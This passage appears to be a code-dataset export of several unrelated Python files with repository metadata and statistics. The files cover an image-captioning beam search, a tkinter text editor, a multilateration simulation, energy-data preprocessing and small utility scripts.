sim_words = [str(t[0]) for t in w2v_sim_list]
enriched_list.append(' '.join(sim_words) + ' ' + w)
except:
enriched_list.append(w)
pass
if len(enriched_list) > 0:
enriched_contents.append(' '.join(enriched_list))
return reveal_similar_links(G, cids, enriched_contents, threshold)
| 35.113208
| 79
| 0.657308
| 1,009
| 7,444
| 4.777007
| 0.197225
| 0.033195
| 0.041494
| 0.017635
| 0.509129
| 0.503112
| 0.495851
| 0.470954
| 0.462448
| 0.45166
| 0
| 0.005916
| 0.273375
| 7,444
| 211
| 80
| 35.279621
| 0.885191
| 0.615798
| 0
| 0.2
| 0
| 0
| 0.006459
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0.033333
| 0.066667
| 0
| 0.233333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c57f29eb95c40842b9781c30c39516ef8329161
| 1,285
|
py
|
Python
|
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | 1
|
2019-12-23T04:30:20.000Z
|
2019-12-23T04:30:20.000Z
|
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | null | null | null |
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | null | null | null |
import sys
import csv
import logging
import datetime
from website.app import setup_django
setup_django()
from osf.models import Node, SpamStatus
from django.db.models import Count
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def main():
dry_run = '--dry' in sys.argv
if not dry_run:
script_utils.add_file_logger(logger, __file__)
nodes_excluding_spam = Node.objects.filter(is_deleted=False, created__gte=datetime.datetime(2018, 3, 14)).exclude(spam_status__in=[SpamStatus.SPAM, SpamStatus.FLAGGED])
# The extra statement here is to round down the datetimes so we can count by dates only
data = nodes_excluding_spam.extra({'date_created': 'date(created)'}).values('date_created').annotate(count=Count('id')).order_by('date_created')
with open('spamless_node_count_through_2018_3_14.csv', mode='w') as csv_file:
fieldnames = ['date_created', 'count']
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
if not dry_run:
writer.writeheader()
for data_point in data:
writer.writerow(data_point)
logger.info('Writing csv data for {} dates'.format(data.count()))
if __name__ == '__main__':
main()
| 32.125
| 173
| 0.721401
| 179
| 1,285
| 4.899441
| 0.486034
| 0.062714
| 0.018244
| 0.025086
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01317
| 0.172763
| 1,285
| 39
| 174
| 32.948718
| 0.811853
| 0.066148
| 0
| 0.074074
| 0
| 0
| 0.126878
| 0.034224
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.296296
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c595afdb533a0fc9550d6782a8298265522f096
| 8,299
|
py
|
Python
|
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | 3
|
2021-04-12T02:23:18.000Z
|
2022-01-06T12:05:24.000Z
|
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | null | null | null |
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | null | null | null |
import os
import time
import h5py
import json
from PIL import Image
import torch
from torch import nn
import torchvision
import torchvision.transforms as transforms
import torch.optim
import torch.nn.functional as F
from torch.utils.data.dataset import random_split
from torch.utils.data import Dataset
from torch.nn.utils.rnn import pack_padded_sequence
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.utils import class_weight
from tqdm.notebook import tqdm
import matplotlib.cm as cm
import torch.backends.cudnn as cudnn
import torch.utils.data
import skimage.transform
from scipy.misc import imread, imresize
device = torch.device("cpu")
def caption_image(encoder, decoder, image_path, word_map, beam_size=3):
"""
Reads an image and captions it with beam search.
Input:
:param encoder: encoder model
:param decoder: decoder model
:param image_path: path to image
:param word_map: word map(word to index mapping)
:param beam_size: number of sequences to consider at each decode-step
Output:
:return: caption, weights for visualization
"""
k = beam_size
vocab_size = len(word_map)
## Read image and process
img = imread(image_path)
if len(img.shape) == 2:
img = img[:, :, np.newaxis]
img = np.concatenate([img, img, img], axis=2)
img = imresize(img, (256, 256))
img = img.transpose(2, 0, 1)
img = img / 255.
img = torch.FloatTensor(img).to(device)
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transform = transforms.Compose([normalize])
image = transform(img) # (3, 256, 256)
# Encode
# (1, 3, 256, 256)
image = image.unsqueeze(0)
#(1, enc_image_size, enc_image_size, encoder_dim)
#(1, 14, 14, 2048)
encoder_out = encoder(image)
enc_image_size = encoder_out.size(1)
encoder_dim = encoder_out.size(3)
# Flatten encoding
# (1, num_pixels, encoder_dim)
# (1, 196, 2048)
encoder_out = encoder_out.view(1, -1, encoder_dim)
num_pixels = encoder_out.size(1)
# We'll treat the problem as having a batch size of k
# (k, num_pixels, encoder_dim)
encoder_out = encoder_out.expand(k, num_pixels, encoder_dim)
# Tensor to store top k previous words at each step; now they're just <start>
k_prev_words = torch.LongTensor([[word_map['<start>']]] * k).to(device) # (k, 1)
# Tensor to store top k sequences; now they're just <start>
# (k, 1)
seqs = k_prev_words
# Tensor to store top k sequences scores; now they're just 0
top_k_scores = torch.zeros(k, 1).to(device) # (k, 1)
# Tensor to store top k sequences alphas; now they're just 1s
# (k, 1, enc_image_size, enc_image_size)
seqs_alpha = torch.ones(k, 1, enc_image_size, enc_image_size).to(device)
# Lists to store completed sequences, their alphas and scores
complete_seqs = list()
complete_seqs_alpha = list()
complete_seqs_scores = list()
# Start decoding
step = 1
h, c = decoder.init_hidden_state(encoder_out)
# s is a number less than or equal to k,
# because sequences are removed from this process once they hit <end>
while True:
# (s, embed_dim)
embeddings = decoder.embedding(k_prev_words).squeeze(1)
# (s, encoder_dim), (s, num_pixels)
awe, alpha = decoder.attention(encoder_out, h)
# (s, enc_image_size, enc_image_size)
alpha = alpha.view(-1, enc_image_size, enc_image_size)
# gating scalar, (s, encoder_dim)
gate = decoder.sigmoid(decoder.f_beta(h))
awe = gate * awe
# (s, decoder_dim)
h, c = decoder.decode_step(torch.cat([embeddings, awe], dim=1), (h, c))
# (s, vocab_size)
scores = decoder.fc(h)
scores = F.log_softmax(scores, dim=1)
# Add
scores = top_k_scores.expand_as(scores) + scores # (s, vocab_size)
# For the first step, all k points will have the same scores (since same k previous words, h, c)
if step == 1:
top_k_scores, top_k_words = scores[0].topk(k, 0, True, True) # (s)
else:
# Unroll and find top scores, and their unrolled indices
top_k_scores, top_k_words = scores.view(-1).topk(k, 0, True, True) # (s)
# print(top_k_words)
# Convert unrolled indices to actual indices of scores
prev_word_inds = top_k_words // vocab_size # (s)
next_word_inds = top_k_words % vocab_size # (s)
# print(seqs[prev_word_inds])
# Add new words to sequences, alphas
seqs = torch.cat([seqs[prev_word_inds], next_word_inds.unsqueeze(1)], dim=1) # (s, step+1)
seqs_alpha = torch.cat([seqs_alpha[prev_word_inds], alpha[prev_word_inds].unsqueeze(1)],
dim=1) # (s, step+1, enc_image_size, enc_image_size)
# Which sequences are incomplete (didn't reach <end>)?
incomplete_inds = [ind for ind, next_word in enumerate(next_word_inds) if
next_word != word_map['<end>']]
## will be empty if none of them have reached <end>
complete_inds = list(set(range(len(next_word_inds))) - set(incomplete_inds))
# Set aside complete sequences
if len(complete_inds) > 0:
complete_seqs.extend(seqs[complete_inds].tolist())
complete_seqs_alpha.extend(seqs_alpha[complete_inds].tolist())
complete_seqs_scores.extend(top_k_scores[complete_inds])
k -= len(complete_inds) # reduce beam length accordingly
# Proceed with incomplete sequences
if k == 0:
break
seqs = seqs[incomplete_inds]
seqs_alpha = seqs_alpha[incomplete_inds]
### updating h's and c's for incomplete sequences
h = h[prev_word_inds[incomplete_inds]]
c = c[prev_word_inds[incomplete_inds]]
encoder_out = encoder_out[prev_word_inds[incomplete_inds]]
top_k_scores = top_k_scores[incomplete_inds].unsqueeze(1)
k_prev_words = next_word_inds[incomplete_inds].unsqueeze(1)
# Break if things have been going on too long
if step > 40:
break
step += 1
# print(complete_seqs)
i = complete_seqs_scores.index(max(complete_seqs_scores))
seq = complete_seqs[i]
alphas = complete_seqs_alpha[i]
return seq, alphas
# def visualize_att(image_path, seq, alphas, rev_word_map, smooth=False):
# """
# Visualizes caption with weights at every word.
# Adapted from paper authors' repo: https://github.com/kelvinxu/arctic-captions/blob/master/alpha_visualization.ipynb
# :param image_path: path to image
# :param seq: generated caption
# :param alphas: attention weights for every time steps
# :param rev_word_map: reverse word mapping, i.e. ix2word
# :param smooth: smooth weights?
# """
# image = Image.open(image_path)
# image = image.resize([14 * 14, 14 * 14], Image.LANCZOS)
# words = [rev_word_map[ind] for ind in seq]
# figures = []
# for t in range(len(words)):
# fig = plt.figure()
# if t > 50:
# break
# #plt.subplot(np.ceil(len(words) / 5.), 5, t + 1)
# fig.text(0, 1, '%s' % (words[t]), color='black', backgroundcolor='white', fontsize=12)
# plt.imshow(image)
# current_alpha = alphas[t, :]
# if smooth:
# alpha = skimage.transform.pyramid_expand(current_alpha.numpy(), upscale=14, sigma=8)
# else:
# alpha = skimage.transform.resize(current_alpha.numpy(), [14 * 14, 14 * 14])
# if t == 0:
# plt.imshow(alpha, alpha=0)
# else:
# plt.imshow(alpha, alpha=0.8)
# plt.set_cmap(cm.Greys_r)
# plt.axis('off')
# figures.append(fig)
# #plt.savefig("horse_riding/"+words[t]+ str(t)+'.png', bbox_inches = 'tight', pad_inches = 0)
# plt.show()
| 32.291829
| 121
| 0.616821
| 1,146
| 8,299
| 4.293194
| 0.270506
| 0.013008
| 0.031707
| 0.018293
| 0.159553
| 0.108943
| 0.084959
| 0.047561
| 0.026016
| 0.014634
| 0
| 0.024151
| 0.276539
| 8,299
| 257
| 122
| 32.291829
| 0.795303
| 0.410049
| 0
| 0.020202
| 0
| 0
| 0.003158
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010101
| false
| 0
| 0.242424
| 0
| 0.262626
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5b1d85968d78e7d6653a282357a7d53ef86e80
| 623
|
py
|
Python
|
auxiliary-scripts/LRC-to-Label.py
|
xbnstudios/show-scripts
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | 1
|
2018-03-08T16:00:31.000Z
|
2018-03-08T16:00:31.000Z
|
auxiliary-scripts/LRC-to-Label.py
|
ManualManul/XBN
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | null | null | null |
auxiliary-scripts/LRC-to-Label.py
|
ManualManul/XBN
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | null | null | null |
import glob
for file in glob.glob("*.lrc"):
filename = file[0:7] # assume fnt-xxx.lrc file format
lrc_file = open(file, encoding="utf-8")
lrc_lines = lrc_file.readlines()
lrc_file.close()
label = open(filename + '.txt', 'w', encoding="utf-8")
print(filename)
for line in lrc_lines[3:]:
time = line[line.find("[")+1:line.find("]")].replace('.', ':').split(':')
labeltime = str(int(time[0]) * 60 + int(time[1])) + '.' + time[2] + '0000'
title = line.split(']',1)[1].rstrip('\n')
label.write(labeltime + ' ' + labeltime + ' ' + title + '\n')
label.close()
| 31.15
| 82
| 0.552167
| 85
| 623
| 3.988235
| 0.482353
| 0.082596
| 0.070796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035052
| 0.221509
| 623
| 19
| 83
| 32.789474
| 0.663918
| 0.048154
| 0
| 0
| 0
| 0
| 0.062606
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0.071429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5b46fd9008363f42f8cbdbddac0fafdcddf679
| 2,750
|
py
|
Python
|
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
] | null | null | null |
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
] | null | null | null |
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
] | null | null | null |
import math
from rlbot.agents.base_agent import SimpleControllerState
from rlbot.utils.structures.game_data_struct import GameTickPacket
from driving.drive import drive_to_target
from base.action import Action
from base.car import Car
from base.ball import Ball
from util.vec import Vec3
from util.boost import BoostTracker, Boost
class BoostGrab(Action):
def __init__(self, boost:Boost=None, boost_tracker:BoostTracker=None, only_in_path=False, max_time_to_boost=None, state:str = None):
super().__init__()
self.boost = boost
self.pad = None
self.boost_tracker = boost_tracker
self.in_path = only_in_path
self.max_time = max_time_to_boost
self.target = None
if self.boost is not None:
self.target = Vec3(self.boost.location)
self.state = "grabbing boost"
if state is not None:
self.state = state
def update(self, packet: GameTickPacket):
if self.boost is not None:
self.boost.update(packet)
def initialize_target_boost(self, car:Car):
if not car.flying:
if not self.max_time:
self.boost, self.pad = car.get_closest_boosts(self.boost_tracker, self.in_path)
if not self.boost:
self.boost = self.pad
else:
self.boost, self.pad, times = car.get_closest_boosts(self.boost_tracker, in_current_path=self.in_path,
path_angle_limit=0, return_time_to=True)
# No boost reachable. Life sucks
if times[0] >= self.max_time and times[1] >= self.max_time:
return False
if times[1] < self.max_time:
self.boost = self.pad
print("Boost target acquired!")
self.target = Vec3(self.boost.location)
return True
def run(self, car: Car=None, ball: Ball=None) -> SimpleControllerState:
if self.finished:
return SimpleControllerState()
if not self.boost and self.boost_tracker is not None:
if not self.initialize_target_boost(car):
self.finished = True
# Bail if finished, no boost passed, or boost no longer active
if self.finished or (not self.boost):
return self.controls
self.controls = drive_to_target(car, self.target.flat(), controls=self.controls)
# finished if close enough, boost taken, or car got enough along the way
if (car.local(self.target-car.location).length() < 100 or not self.boost.is_active) or car.boost > 99:
print("Grabbed boost!")
self.finished = True
return self.controls
| 42.96875
| 136
| 0.623636
| 360
| 2,750
| 4.613889
| 0.255556
| 0.10295
| 0.036123
| 0.038531
| 0.171583
| 0.138471
| 0.103552
| 0
| 0
| 0
| 0
| 0.006202
| 0.296364
| 2,750
| 64
| 137
| 42.96875
| 0.852196
| 0.058909
| 0
| 0.181818
| 0
| 0
| 0.019342
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072727
| false
| 0
| 0.163636
| 0
| 0.345455
| 0.036364
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5bb249ee0abe83ae7713176bfcb5fd594b89eb
| 2,026
|
py
|
Python
|
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
import sys
from tkinter import *
from tkinter import filedialog
####################
# FUNCTIONS #
####################
def saveas():
global text
t = text.get("1.0", "end-1c")
savelocation = filedialog.asksaveasfilename()
file1 = open(savelocation, "w+")
file1.write(t)
file1.close()
def darktheme():
global text
text.config(background='black', foreground='white',
insertbackground='white')
def lighttheme():
global text
text.config(background='white', foreground='black',
insertbackground='black')
def FontHelvetica():
global text
text.config(font="Helvetica")
def FontCourier():
global text
text.config(font="Courier")
def FontArial():
global text
text.config(font="Arial")
def FontTimes():
global text
text.config(font='Times')
#########################
# TEXT EDITOR
#########################
# Create text editor
text_editor = Tk("Kenza's text editor")
# Add text widget
text = Text(text_editor)
text.grid()
# Add save button
button = Button(text_editor, text="Save", command=saveas)
button.grid(row=1, column=1)
# Dark mode
theme = Button(text_editor, text="Dark", command=darktheme)
theme.grid(row=1, column=2)
# Light mode
theme = Button(text_editor, text="Light", command=lighttheme)
theme.grid(row=1, column=3)
# Add font menu
font = Menubutton(text_editor, text="Font")
font.grid(row=1, column=4)
font.menu = Menu(font, tearoff=0)
font["menu"] = font.menu
Helvetica = IntVar()
Arial = IntVar()
Times = IntVar()
Courier = IntVar()
font.menu.add_checkbutton(label="Courier", variable=Courier,
command=FontCourier)
font.menu.add_checkbutton(label="Helvetica", variable=Helvetica,
command=FontHelvetica)
font.menu.add_checkbutton(label="Arial", variable=Arial,
command=FontArial)
font.menu.add_checkbutton(label="Times", variable=Times,
command=FontTimes)
text_editor.mainloop()
| 20.886598
| 64
| 0.633268
| 235
| 2,026
| 5.412766
| 0.289362
| 0.078616
| 0.066038
| 0.09434
| 0.283019
| 0.045597
| 0
| 0
| 0
| 0
| 0
| 0.009231
| 0.197927
| 2,026
| 96
| 65
| 21.104167
| 0.773538
| 0.053307
| 0
| 0.125
| 0
| 0
| 0.073157
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.053571
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5cbe5565f6ab8319a2c93389c8a977b851666a
| 525
|
py
|
Python
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 106
|
2017-11-09T13:58:45.000Z
|
2021-12-20T03:11:19.000Z
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 6
|
2017-10-30T13:29:49.000Z
|
2021-09-13T12:06:59.000Z
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 39
|
2017-10-30T16:35:01.000Z
|
2021-10-31T10:32:48.000Z
|
""" Default import all .py files in current directory """
from glob import iglob
from re import search
__all__ = []
""" Find all DB model modules and their paths """
for path in iglob('./**/*.py', recursive=True):
model_pattern = '.*/models/\w+\.py'
if search(model_pattern, path) is not None:
""" Get model modules """
FILE_INDEX = -1 # Files are the last part of a path
module = path.split('/')[FILE_INDEX].rstrip('.py')
if module != '__init__':
__all__.append(module)
| 32.8125
| 59
| 0.617143
| 72
| 525
| 4.277778
| 0.638889
| 0.077922
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002494
| 0.23619
| 525
| 15
| 60
| 35
| 0.765586
| 0.161905
| 0
| 0
| 0
| 0
| 0.10585
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5cc632bb94b5ef7ccfb33dc669053fbfcfe760
| 1,374
|
py
|
Python
|
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
from tdoa_sim import TDOASim
import numpy as np
class Multilateration(TDOASim):
# Assumptions: Three hydrophones forming a right angle in the xz plane
# Hydrophones 1 and 2 form the horizontal pair, and 2 and 3 form the vertical
# https://en.wikipedia.org/wiki/Multilateration - cartesian solution
def calculate_xyz(self, pinger_loc):
relative_toas = self.calc_tdoas(pinger_loc) + .01 # Add 1 to eliminate div by 0 - this needs a much better implementation
x1, y1, z1 = self.hydrophones[0]
t1 = relative_toas[0]
c = self.v_sound
lhs = []
rhs = []
for i in range(1, 4):
xm, ym, zm = self.hydrophones[i]
tm = relative_toas[i]
A = (2 * xm) / (c * tm) - (2 * x1) / (c * t1)
B = (2 * ym) / (c * tm) - (2 * y1) / (c * t1)
C = (2 * zm) / (c * tm) - (2 * z1) / (c * t1)
D = c*tm - c*t1 - (xm ** 2 + ym ** 2 +zm ** 2)/(c * tm) + (x1 ** 2 + y1 ** 2 + z1 ** 2)/(c * t1)
lhs.append([A, B, C])
rhs.append(-D)
lhs = np.array(lhs)
rhs = np.array(rhs)
return np.linalg.solve(lhs, rhs)
def calculate_bearing(self, pinger_loc):
x, y, z = self.calculate_xyz(pinger_loc)
return (np.rad2deg(np.arctan2(y, x)), np.rad2deg(np.arctan2(np.sqrt(x ** 2 + y ** 2), z)))
| 37.135135
| 129
| 0.532751
| 207
| 1,374
| 3.47343
| 0.429952
| 0.020862
| 0.01669
| 0.05007
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048335
| 0.322416
| 1,374
| 36
| 130
| 38.166667
| 0.723953
| 0.204512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.08
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5dbe6d61fbd8cfdc1de683ac736616ff35e009
| 2,811
|
py
|
Python
|
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | 1
|
2021-09-18T08:01:19.000Z
|
2021-09-18T08:01:19.000Z
|
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | null | null | null |
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | 1
|
2018-05-13T08:39:46.000Z
|
2018-05-13T08:39:46.000Z
|
#! usr/bin/python3
import pandas as pd
import re
import numpy as np
import os
import sys
from collections import OrderedDict, defaultdict
import matplotlib as mpl
import matplotlib.pyplot as plt
# import seaborn as sns
from scipy import stats, integrate
# sns.set() # switch to seaborn default
# sns.set_style("whitegrid")
#load sector msncodes
tn_msncodes = pd.read_csv("data/csv/consumption/sector/tn_sector.csv", engine='c', low_memory=True)["MSN"]
#load state data
tx_data = pd.read_csv("data/csv/state_data/tx_data.csv", engine='c', low_memory=True)
tx_msn = []
tx_year = []
tx_value = []
for i in range(len(tx_data["MSN"])):
for j in range(len(tn_msncodes)):
if tx_data["MSN"][i] == tn_msncodes[j]:
tx_msn.append(tx_data["MSN"][i])
tx_year.append(tx_data["Year"][i])
tx_value.append(tx_data["Data"][i])
else:
pass
tx_tn = OrderedDict()
tx_tn["MSN"] = tx_msn
tx_tn["Year"] = tx_year
tx_tn["Data"] = tx_value
tx_tn_data = pd.DataFrame(tx_tn)
tx_tn_data.to_csv("data/csv/consumption/sector/tx/tx_tn_data.csv",
index=False, index_label=False, sep=',')
# print(tx_tn_data)
sectors = ["TNACB", "TNCCB", "TNICB", "TNRCB"]
tnacb = OrderedDict()
tnacb["Year"] = []
tnacb["Data"] = []
tnccb = OrderedDict()
tnccb["Year"] = []
tnccb["Data"] = []
tnicb = OrderedDict()
tnicb["Year"] = []
tnicb["Data"] = []
tnrcb = OrderedDict()
tnrcb["Year"] = []
tnrcb["Data"] = []
for i in range(len(tx_tn_data["MSN"])):
if tx_tn_data["MSN"][i] == "TNACB":
tnacb["Year"].append(tx_tn_data["Year"][i])
tnacb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNCCB":
tnccb["Year"].append(tx_tn_data["Year"][i])
tnccb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNICB":
tnicb["Year"].append(tx_tn_data["Year"][i])
tnicb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNRCB":
tnrcb["Year"].append(tx_tn_data["Year"][i])
tnrcb["Data"].append(tx_tn_data["Data"][i])
else:
pass
tnacb_data = pd.DataFrame(tnacb)
tnacb_data.to_csv("data/csv/consumption/sector/tx/tn/tnacb.csv",
index=False, index_label=False, sep=',')
tnccb_data = pd.DataFrame(tnccb)
tnccb_data.to_csv("data/csv/consumption/sector/tx/tn/tnccb.csv",
index=False, index_label=False, sep=',')
tnicb_data = pd.DataFrame(tnicb)
tnicb_data.to_csv("data/csv/consumption/sector/tx/tn/tnicb.csv",
index=False, index_label=False, sep=',')
tnrcb_data = pd.DataFrame(tnrcb)
tnrcb_data.to_csv("data/csv/consumption/sector/tx/tn/tnrcb.csv",
index=False, index_label=False, sep=',')
# print(tnacb_data)
# print(tnccb_data)
# print(tnicb_data)
# print(tnrcb_data)
| 30.554348
| 106
| 0.645322
| 428
| 2,811
| 4.035047
| 0.165888
| 0.06022
| 0.083382
| 0.064852
| 0.430805
| 0.381008
| 0.335843
| 0.215402
| 0.153445
| 0.067748
| 0
| 0.000429
| 0.170758
| 2,811
| 91
| 107
| 30.89011
| 0.740455
| 0.08111
| 0
| 0.130435
| 0
| 0
| 0.18592
| 0.112408
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.028986
| 0.130435
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c699b1ae35663ad09b05a480af4601cff664c7b
| 1,276
|
py
|
Python
|
opennem/core/stations/station_code_from_duids.py
|
willhac/opennem
|
c8fbcd60e06898e1eeb2dad89548c4ece1b9a319
|
[
"MIT"
] | null | null | null |
opennem/core/stations/station_code_from_duids.py
|
willhac/opennem
|
c8fbcd60e06898e1eeb2dad89548c4ece1b9a319
|
[
"MIT"
] | 1
|
2020-09-06T04:17:59.000Z
|
2020-09-06T04:17:59.000Z
|
opennem/core/stations/station_code_from_duids.py
|
tourdownunder/opennem
|
deec3e2079db9d9d84171010fd0c239170d1e7ce
|
[
"MIT"
] | null | null | null |
from functools import reduce
from typing import List, Optional
from opennem.core.normalizers import is_single_number
def getcommonletters(strlist):
return "".join(
[
x[0]
for x in zip(*strlist)
if reduce(lambda a, b: (a == b) and a or None, x)
]
)
def findcommonstart(strlist):
strlist = strlist[:]
prev = None
while True:
common = getcommonletters(strlist)
if common == prev:
break
strlist.append(common)
prev = common
return getcommonletters(strlist)
def station_code_from_duids(duids: List[str]) -> Optional[str]:
"""
Derives a station code from a list of duids
ex.
BARRON1,BARRON2 => BARRON
OSBAG,OSBAG => OSBAG
"""
if type(duids) is not list:
return None
if not duids:
return None
if len(duids) == 0:
return None
duids_uniq = list(set(duids))
common = findcommonstart(duids_uniq)
if not common:
return None
# strip last character if we have one
if is_single_number(common[-1]):
common = common[:-1]
if common.endswith("_"):
common = common[:-1]
if len(common) > 2:
return common
return None
| 19.044776
| 63
| 0.580721
| 154
| 1,276
| 4.746753
| 0.402597
| 0.068399
